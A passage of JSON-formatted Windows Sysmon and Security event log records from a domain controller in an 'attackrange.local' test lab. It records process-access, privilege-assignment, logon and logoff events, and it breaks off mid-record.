{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3134,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3135,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3136,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3137,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.962\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-10EF-5F25-0000-0010DC450500}\r\nTargetProcessId: 4732\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.962","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-10EF-5F25-0000-0010DC450500}","TargetProcessId":"4732","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3138,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:28.103\r\nSourceProcessGUID: {E2A3D6B1-10EF-5F25-0000-0010DC450500}\r\nSourceProcessId: 4732\r\nSourceThreadId: 4592\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:28.103","SourceProcessGUID":"{E2A3D6B1-10EF-5F25-0000-0010DC450500}","SourceProcessId":"4732","SourceThreadId":"4592","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3139,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:28.385\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:28.385","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220389,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x54831\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x54831","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:51:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220390,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x54831\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t52587\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x54831","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"52587","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:51:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220391,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x54831\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x54831","LogonType":"3","EventReceivedTime":"2020-08-01 06:51:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3140,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:29.387\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files 